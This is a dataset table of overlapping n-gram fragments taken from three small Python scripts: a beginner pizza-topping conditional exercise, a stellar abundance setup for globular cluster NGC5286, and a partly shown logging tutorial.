ngram
listlengths 0
67.8k
|
|---|
[
"'mushrooms' if requested_topping != 'anchovies': print(\"Hold the anchovies!\") answer = 17 if answer",
"cheese'] for requested_topping in requested_toppings: if requested_topping in avaliable_toppings: print(\"Adding \" + requested_topping",
"requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni' in requested_toppings: print(\"Adding pepperoni.\") if 'extra cheese' in",
"'extra cheese' in requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished making you pizza!\") requested_toppings =",
"making your pizza!\") requested_toppings = [] if requested_toppings: for requested_topping in requested_toppings: print(\"Adding",
"we are out of green peppers fight now.\") else: print(\"Adding \" + requested_topping",
"print(\"Adding extra cheese.\") print(\"\\nFinished making you pizza!\") requested_toppings = ['mushrooms', 'green peppers', 'extra",
"if 'pepperoni' in requested_toppings: print(\"Adding pepperoni.\") if 'extra cheese' in requested_toppings: print(\"Adding extra",
"requested_toppings = [] if requested_toppings: for requested_topping in requested_toppings: print(\"Adding \" + requested_topping",
"requested_toppings = ['mushrooms', 'extra cheese'] if 'mushrooms' in requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni'",
"'green peppers', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping == 'green peppers':",
"print(\"Are you sure you want a pizza?\") avaliable_toppings = ['mushrooms', 'olives', 'green peppers',",
"answer != 42: print(\"That is not the correct answer. Please try again!\") requested_toppings",
"'extra cheese'] for requested_topping in requested_toppings: if requested_topping == 'green peppers': print(\"Sorry, we",
"print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\") requested_toppings = []",
"!= 42: print(\"That is not the correct answer. Please try again!\") requested_toppings =",
"print(\"\\nFinished making your pizza!\") else: print(\"Are you sure you want a pizza?\") avaliable_toppings",
"in requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni' in requested_toppings: print(\"Adding pepperoni.\") if 'extra cheese'",
"print(\"That is not the correct answer. Please try again!\") requested_toppings = ['mushrooms', 'extra",
"print(\"Adding \" + requested_topping + \".\") else: print(\"Sorry, we don't have \" +",
"the correct answer. Please try again!\") requested_toppings = ['mushrooms', 'extra cheese'] if 'mushrooms'",
"you sure you want a pizza?\") avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni',",
"if 'extra cheese' in requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished making you pizza!\") requested_toppings",
"if requested_topping in avaliable_toppings: print(\"Adding \" + requested_topping + \".\") else: print(\"Sorry, we",
"again!\") requested_toppings = ['mushrooms', 'extra cheese'] if 'mushrooms' in requested_toppings: print(\"Adding mushrooms.\") if",
"= ['mushrooms', 'green peppers', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping ==",
"print(\"Sorry, we are out of green peppers fight now.\") else: print(\"Adding \" +",
"pizza!\") requested_toppings = [] if requested_toppings: for requested_topping in requested_toppings: print(\"Adding \" +",
"in requested_toppings: print(\"Adding pepperoni.\") if 'extra cheese' in requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished",
"Please try again!\") requested_toppings = ['mushrooms', 'extra cheese'] if 'mushrooms' in requested_toppings: print(\"Adding",
"'pepperoni', 'pineapple', 'extra cheese'] requested_toppings = ['mushrooms', 'french fries', 'extra cheese'] for requested_topping",
"17 if answer != 42: print(\"That is not the correct answer. Please try",
"out of green peppers fight now.\") else: print(\"Adding \" + requested_topping + \".\")",
"\" + requested_topping + \".\") else: print(\"Sorry, we don't have \" + requested_topping",
"anchovies!\") answer = 17 if answer != 42: print(\"That is not the correct",
"requested_topping == 'green peppers': print(\"Sorry, we are out of green peppers fight now.\")",
"['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings = ['mushrooms', 'french fries',",
"'french fries', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping in avaliable_toppings: print(\"Adding",
"peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings = ['mushrooms', 'french fries', 'extra cheese'] for",
"print(\"Hold the anchovies!\") answer = 17 if answer != 42: print(\"That is not",
"answer = 17 if answer != 42: print(\"That is not the correct answer.",
"answer. Please try again!\") requested_toppings = ['mushrooms', 'extra cheese'] if 'mushrooms' in requested_toppings:",
"you pizza!\") requested_toppings = ['mushrooms', 'green peppers', 'extra cheese'] for requested_topping in requested_toppings:",
"<filename>Python/python-practice/chapter5-if/toppints.py requested_topping = 'mushrooms' if requested_topping != 'anchovies': print(\"Hold the anchovies!\") answer =",
"pizza!\") requested_toppings = ['mushrooms', 'green peppers', 'extra cheese'] for requested_topping in requested_toppings: if",
"requested_topping in requested_toppings: if requested_topping == 'green peppers': print(\"Sorry, we are out of",
"else: print(\"Sorry, we don't have \" + requested_topping + \".\") print(\"\\nFinished making your",
"cheese' in requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished making you pizza!\") requested_toppings = ['mushrooms',",
"peppers', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping == 'green peppers': print(\"Sorry,",
"in requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished making you pizza!\") requested_toppings = ['mushrooms', 'green",
"peppers': print(\"Sorry, we are out of green peppers fight now.\") else: print(\"Adding \"",
"requested_topping + \".\") else: print(\"Sorry, we don't have \" + requested_topping + \".\")",
"'pepperoni' in requested_toppings: print(\"Adding pepperoni.\") if 'extra cheese' in requested_toppings: print(\"Adding extra cheese.\")",
"now.\") else: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\") requested_toppings",
"in avaliable_toppings: print(\"Adding \" + requested_topping + \".\") else: print(\"Sorry, we don't have",
"requested_toppings = ['mushrooms', 'green peppers', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping",
"cheese'] if 'mushrooms' in requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni' in requested_toppings: print(\"Adding pepperoni.\")",
"a pizza?\") avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings",
"print(\"Adding mushrooms.\") if 'pepperoni' in requested_toppings: print(\"Adding pepperoni.\") if 'extra cheese' in requested_toppings:",
"print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\") else: print(\"Are you",
"= ['mushrooms', 'french fries', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping in",
"requested_toppings: for requested_topping in requested_toppings: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making",
"pizza?\") avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings =",
"'extra cheese'] for requested_topping in requested_toppings: if requested_topping in avaliable_toppings: print(\"Adding \" +",
"requested_toppings: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\") else: print(\"Are",
"green peppers fight now.\") else: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making",
"\" + requested_topping + \".\") print(\"\\nFinished making your pizza!\") else: print(\"Are you sure",
"if requested_topping != 'anchovies': print(\"Hold the anchovies!\") answer = 17 if answer !=",
"= 17 if answer != 42: print(\"That is not the correct answer. Please",
"you want a pizza?\") avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra",
"if 'mushrooms' in requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni' in requested_toppings: print(\"Adding pepperoni.\") if",
"fight now.\") else: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\")",
"= ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings = ['mushrooms', 'french",
"pizza!\") else: print(\"Are you sure you want a pizza?\") avaliable_toppings = ['mushrooms', 'olives',",
"peppers fight now.\") else: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your",
"+ \".\") else: print(\"Sorry, we don't have \" + requested_topping + \".\") print(\"\\nFinished",
"requested_topping != 'anchovies': print(\"Hold the anchovies!\") answer = 17 if answer != 42:",
"!= 'anchovies': print(\"Hold the anchovies!\") answer = 17 if answer != 42: print(\"That",
"in requested_toppings: if requested_topping in avaliable_toppings: print(\"Adding \" + requested_topping + \".\") else:",
"for requested_topping in requested_toppings: if requested_topping in avaliable_toppings: print(\"Adding \" + requested_topping +",
"'extra cheese'] requested_toppings = ['mushrooms', 'french fries', 'extra cheese'] for requested_topping in requested_toppings:",
"if requested_topping == 'green peppers': print(\"Sorry, we are out of green peppers fight",
"requested_topping in requested_toppings: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\")",
"the anchovies!\") answer = 17 if answer != 42: print(\"That is not the",
"\".\") print(\"\\nFinished making your pizza!\") else: print(\"Are you sure you want a pizza?\")",
"= 'mushrooms' if requested_topping != 'anchovies': print(\"Hold the anchovies!\") answer = 17 if",
"'extra cheese'] if 'mushrooms' in requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni' in requested_toppings: print(\"Adding",
"mushrooms.\") if 'pepperoni' in requested_toppings: print(\"Adding pepperoni.\") if 'extra cheese' in requested_toppings: print(\"Adding",
"want a pizza?\") avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese']",
"for requested_topping in requested_toppings: if requested_topping == 'green peppers': print(\"Sorry, we are out",
"'green peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings = ['mushrooms', 'french fries', 'extra cheese']",
"if answer != 42: print(\"That is not the correct answer. Please try again!\")",
"requested_topping in avaliable_toppings: print(\"Adding \" + requested_topping + \".\") else: print(\"Sorry, we don't",
"'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings = ['mushrooms', 'french fries', 'extra",
"pepperoni.\") if 'extra cheese' in requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished making you pizza!\")",
"requested_topping + \".\") print(\"\\nFinished making your pizza!\") requested_toppings = [] if requested_toppings: for",
"print(\"Sorry, we don't have \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\")",
"making your pizza!\") else: print(\"Are you sure you want a pizza?\") avaliable_toppings =",
"print(\"Adding pepperoni.\") if 'extra cheese' in requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished making you",
"try again!\") requested_toppings = ['mushrooms', 'extra cheese'] if 'mushrooms' in requested_toppings: print(\"Adding mushrooms.\")",
"['mushrooms', 'extra cheese'] if 'mushrooms' in requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni' in requested_toppings:",
"in requested_toppings: if requested_topping == 'green peppers': print(\"Sorry, we are out of green",
"['mushrooms', 'green peppers', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping == 'green",
"'mushrooms' in requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni' in requested_toppings: print(\"Adding pepperoni.\") if 'extra",
"'green peppers': print(\"Sorry, we are out of green peppers fight now.\") else: print(\"Adding",
"sure you want a pizza?\") avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple',",
"cheese.\") print(\"\\nFinished making you pizza!\") requested_toppings = ['mushrooms', 'green peppers', 'extra cheese'] for",
"requested_topping = 'mushrooms' if requested_topping != 'anchovies': print(\"Hold the anchovies!\") answer = 17",
"in requested_toppings: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\") else:",
"+ \".\") print(\"\\nFinished making your pizza!\") requested_toppings = [] if requested_toppings: for requested_topping",
"= [] if requested_toppings: for requested_topping in requested_toppings: print(\"Adding \" + requested_topping +",
"correct answer. Please try again!\") requested_toppings = ['mushrooms', 'extra cheese'] if 'mushrooms' in",
"'anchovies': print(\"Hold the anchovies!\") answer = 17 if answer != 42: print(\"That is",
"for requested_topping in requested_toppings: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your",
"['mushrooms', 'french fries', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping in avaliable_toppings:",
"avaliable_toppings: print(\"Adding \" + requested_topping + \".\") else: print(\"Sorry, we don't have \"",
"print(\"\\nFinished making you pizza!\") requested_toppings = ['mushrooms', 'green peppers', 'extra cheese'] for requested_topping",
"+ requested_topping + \".\") else: print(\"Sorry, we don't have \" + requested_topping +",
"= ['mushrooms', 'extra cheese'] if 'mushrooms' in requested_toppings: print(\"Adding mushrooms.\") if 'pepperoni' in",
"\" + requested_topping + \".\") print(\"\\nFinished making your pizza!\") requested_toppings = [] if",
"requested_toppings: if requested_topping in avaliable_toppings: print(\"Adding \" + requested_topping + \".\") else: print(\"Sorry,",
"of green peppers fight now.\") else: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished",
"your pizza!\") requested_toppings = [] if requested_toppings: for requested_topping in requested_toppings: print(\"Adding \"",
"else: print(\"Are you sure you want a pizza?\") avaliable_toppings = ['mushrooms', 'olives', 'green",
"42: print(\"That is not the correct answer. Please try again!\") requested_toppings = ['mushrooms',",
"requested_topping + \".\") print(\"\\nFinished making your pizza!\") else: print(\"Are you sure you want",
"fries', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping in avaliable_toppings: print(\"Adding \"",
"is not the correct answer. Please try again!\") requested_toppings = ['mushrooms', 'extra cheese']",
"requested_toppings: if requested_topping == 'green peppers': print(\"Sorry, we are out of green peppers",
"\".\") print(\"\\nFinished making your pizza!\") requested_toppings = [] if requested_toppings: for requested_topping in",
"requested_toppings = ['mushrooms', 'french fries', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping",
"'pineapple', 'extra cheese'] requested_toppings = ['mushrooms', 'french fries', 'extra cheese'] for requested_topping in",
"cheese'] for requested_topping in requested_toppings: if requested_topping == 'green peppers': print(\"Sorry, we are",
"== 'green peppers': print(\"Sorry, we are out of green peppers fight now.\") else:",
"extra cheese.\") print(\"\\nFinished making you pizza!\") requested_toppings = ['mushrooms', 'green peppers', 'extra cheese']",
"requested_toppings: print(\"Adding pepperoni.\") if 'extra cheese' in requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished making",
"print(\"\\nFinished making your pizza!\") requested_toppings = [] if requested_toppings: for requested_topping in requested_toppings:",
"\".\") else: print(\"Sorry, we don't have \" + requested_topping + \".\") print(\"\\nFinished making",
"+ requested_topping + \".\") print(\"\\nFinished making your pizza!\") requested_toppings = [] if requested_toppings:",
"requested_topping in requested_toppings: if requested_topping in avaliable_toppings: print(\"Adding \" + requested_topping + \".\")",
"+ requested_topping + \".\") print(\"\\nFinished making your pizza!\") else: print(\"Are you sure you",
"else: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished making your pizza!\") requested_toppings =",
"cheese'] requested_toppings = ['mushrooms', 'french fries', 'extra cheese'] for requested_topping in requested_toppings: if",
"are out of green peppers fight now.\") else: print(\"Adding \" + requested_topping +",
"if requested_toppings: for requested_topping in requested_toppings: print(\"Adding \" + requested_topping + \".\") print(\"\\nFinished",
"making you pizza!\") requested_toppings = ['mushrooms', 'green peppers', 'extra cheese'] for requested_topping in",
"your pizza!\") else: print(\"Are you sure you want a pizza?\") avaliable_toppings = ['mushrooms',",
"+ \".\") print(\"\\nFinished making your pizza!\") else: print(\"Are you sure you want a",
"[] if requested_toppings: for requested_topping in requested_toppings: print(\"Adding \" + requested_topping + \".\")",
"avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings = ['mushrooms',",
"requested_toppings: print(\"Adding extra cheese.\") print(\"\\nFinished making you pizza!\") requested_toppings = ['mushrooms', 'green peppers',",
"not the correct answer. Please try again!\") requested_toppings = ['mushrooms', 'extra cheese'] if"
] |
[
"- elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'], 'nd': 0.20 + elsolarlogepsilon['nd'] -",
"population in NGC5286 # from Marino et al. (2015) 2015MNRAS.450..815M # [Fe/H] =",
"+ log(X/Fe)_solar targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18",
"- elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] -",
"# log X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe = { 'o': 0.58 +",
"elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'],",
"Marino et al. (2015) 2015MNRAS.450..815M # [Fe/H] = -1.92 # log X/Fe =",
"= -1.92 # log X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe = { 'o':",
"0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'], 'nd': 0.20",
"from abundsolar import elsolarlogepsilon zfactor = 10 ** -1.92 # mean of s-poor",
"** -1.92 # mean of s-poor population in NGC5286 # from Marino et",
"# [Fe/H] = -1.92 # log X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe =",
"'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce':",
"0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29",
"elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'], 'nd': 0.20 + elsolarlogepsilon['nd']",
"- elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] -",
"of s-poor population in NGC5286 # from Marino et al. (2015) 2015MNRAS.450..815M #",
"elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba':",
"from Marino et al. (2015) 2015MNRAS.450..815M # [Fe/H] = -1.92 # log X/Fe",
"{ 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'],",
"[X/Fe] + log(X/Fe)_solar targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na':",
"0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24",
"elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la']",
"- elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] -",
"X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] -",
"- elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'],",
"= [X/Fe] + log(X/Fe)_solar targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'],",
"elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr']",
"0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38",
"elsolarlogepsilon zfactor = 10 ** -1.92 # mean of s-poor population in NGC5286",
"log X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o']",
"10 ** -1.92 # mean of s-poor population in NGC5286 # from Marino",
"elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'],",
"- elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'],",
"al. (2015) 2015MNRAS.450..815M # [Fe/H] = -1.92 # log X/Fe = [X/Fe] +",
"elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'],",
"elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] -",
"'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la':",
"elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] -",
"elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'], 'nd': 0.20 + elsolarlogepsilon['nd'] - elsolarlogepsilon['fe']",
"+ elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr']",
"'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y':",
"-0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 +",
"'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'], 'nd': 0.20 + elsolarlogepsilon['nd'] - elsolarlogepsilon['fe'] }",
"in NGC5286 # from Marino et al. (2015) 2015MNRAS.450..815M # [Fe/H] = -1.92",
"zfactor = 10 ** -1.92 # mean of s-poor population in NGC5286 #",
"s-poor population in NGC5286 # from Marino et al. (2015) 2015MNRAS.450..815M # [Fe/H]",
"-1.92 # mean of s-poor population in NGC5286 # from Marino et al.",
"log(X/Fe)_solar targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 +",
"+ elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 +",
"'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17",
"elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'],",
"- elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] -",
"'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03",
"= 10 ** -1.92 # mean of s-poor population in NGC5286 # from",
"abundsolar import elsolarlogepsilon zfactor = 10 ** -1.92 # mean of s-poor population",
"mean of s-poor population in NGC5286 # from Marino et al. (2015) 2015MNRAS.450..815M",
"0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 +",
"# from Marino et al. (2015) 2015MNRAS.450..815M # [Fe/H] = -1.92 # log",
"# mean of s-poor population in NGC5286 # from Marino et al. (2015)",
"= { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] -",
"elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce']",
"2015MNRAS.450..815M # [Fe/H] = -1.92 # log X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe",
"+ elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'], 'nd': 0.20 +",
"[Fe/H] = -1.92 # log X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe = {",
"import elsolarlogepsilon zfactor = 10 ** -1.92 # mean of s-poor population in",
"+elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba']",
"targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na']",
"'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr':",
"0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04",
"elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr':",
"+ elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 +",
"'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'], 'nd':",
"(2015) 2015MNRAS.450..815M # [Fe/H] = -1.92 # log X/Fe = [X/Fe] + log(X/Fe)_solar",
"et al. (2015) 2015MNRAS.450..815M # [Fe/H] = -1.92 # log X/Fe = [X/Fe]",
"+ elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 +",
"+ elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y']",
"-1.92 # log X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe = { 'o': 0.58",
"NGC5286 # from Marino et al. (2015) 2015MNRAS.450..815M # [Fe/H] = -1.92 #"
] |
[
"2 # c = a + b # time.sleep(1) # # if MODE",
"MODE == \"INFO\": # print(\"a:{}, b:{}\".format(a,b)) # if MODE == \"INFO\": # print(\"c:{}\".format(c))",
"# print(\"===start: not use logging===\") # # logレベルの設定 # MODE = \"INFO\" #",
"when displaying imfomation on the screen ) for i in range(5): # 適当な繰り返しの処理を再現",
"* 2 c = a + b time.sleep(1) # DEBUGレベルの処理 logging.debug(\"a:{}, b:{}\".format(a,b)) #",
"# a = i # b = i * 2 # c =",
"= i * 2 # c = a + b # time.sleep(1) #",
"== \"DEBUG\" or MODE == \"INFO\": # print(\"a:{}, b:{}\".format(a,b)) # if MODE ==",
"# 適当な処理・処理時間を再現 # a = i # b = i * 2 #",
"# print(\"c:{}\".format(c)) print(\"===start: use logging===\") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" #",
"c = a + b # time.sleep(1) # # if MODE == \"DEBUG\"",
"imfomation on the screen ) for i in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現",
"print(\"===start: not use logging===\") # # logレベルの設定 # MODE = \"INFO\" # for",
"# # if MODE == \"DEBUG\" or MODE == \"INFO\": # print(\"a:{}, b:{}\".format(a,b))",
"= i # b = i * 2 # c = a +",
"a = i b = i * 2 c = a + b",
"# # 適当な処理・処理時間を再現 # a = i # b = i * 2",
"or MODE == \"INFO\": # print(\"a:{}, b:{}\".format(a,b)) # if MODE == \"INFO\": #",
"i in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i b = i",
"the screen ) for i in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a =",
"import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename=\"log/basic_log.log\" # This kwarg is not necessary",
"2 c = a + b time.sleep(1) # DEBUGレベルの処理 logging.debug(\"a:{}, b:{}\".format(a,b)) # INFOレベルの処理",
"= i b = i * 2 c = a + b time.sleep(1)",
"is not necessary when displaying imfomation on the screen ) for i in",
"= a + b # time.sleep(1) # # if MODE == \"DEBUG\" or",
"i * 2 c = a + b time.sleep(1) # DEBUGレベルの処理 logging.debug(\"a:{}, b:{}\".format(a,b))",
"if MODE == \"DEBUG\" or MODE == \"INFO\": # print(\"a:{}, b:{}\".format(a,b)) # if",
"i in range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a = i #",
"MODE == \"DEBUG\" or MODE == \"INFO\": # print(\"a:{}, b:{}\".format(a,b)) # if MODE",
"= \"INFO\" # for i in range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 #",
